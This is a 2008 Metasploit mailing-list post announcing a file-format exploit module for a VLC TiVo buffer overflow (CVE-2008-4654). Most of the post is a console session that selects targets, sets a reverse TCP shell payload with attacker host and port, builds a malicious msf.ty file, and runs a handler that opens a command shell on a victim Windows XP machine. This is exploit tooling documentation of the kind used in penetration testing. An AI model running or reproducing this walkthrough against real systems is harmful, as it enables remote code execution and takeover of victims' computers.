Metasploit mailing list archives

fileformat exploits.


From: mc at metasploit.com (MC)
Date: Tue, 2 Dec 2008 20:33:56 -0500 (EST)

Just added a small mixin and example exploit that may assist with file 
format based bugs. Quick demo:

msf > resource /tmp/fileformat_test
resource> use exploit/windows/fileformat/videolan_tivo
resource> info

       Name: VideoLAN VLC TiVo Buffer Overflow
    Version: $Revision:$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  MC <y0 at w00t-shell.net>

Available targets:
  Id  Name
  --  ----
  0   VideoLAN VLC 0.9.4 (XP SP3 English)
  1   VideoLAN VLC 0.9.2 (XP SP3 English)

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  FILENAME    msf.ty            no        The file name.
  OUTPUTPATH  ./data/exploits/  no        The location of the file.

Payload information:
  Space: 550
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By
  creating a malicious TY file, a remote attacker could overflow a
  buffer and execute arbitrary code.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4654
  http://www.securityfocus.com/bid/31813

resource> set TARGET 1
TARGET => 1
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 172.10.1.100
LHOST => 172.10.1.100
resource> set LPORT 1975
LPORT => 1975
resource> exploit

[*] Handler binding to LHOST 172.10.1.100
[*] Started reverse handler
[*] Creating 'msf.ty' file ...
[*] File 'msf.ty' is located in './data/exploits/' ...
[*] Exploit completed, but no session was created.
msf exploit(videolan_tivo) > resource /tmp/recieve
resource> use exploit/multi/handler
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 172.10.1.100
LHOST => 172.10.1.100
resource> set LPORT 1975
LPORT => 1975
resource> exploit

[*] Handler binding to LHOST 172.10.1.100
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (172.10.1.100:1975 -> 172.10.1.104:1055)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\VideoLAN\VLC>

...the same module exists in modules/exploits/windows/misc/ and can be 
used via network-based attacks.
-- 
~ mc
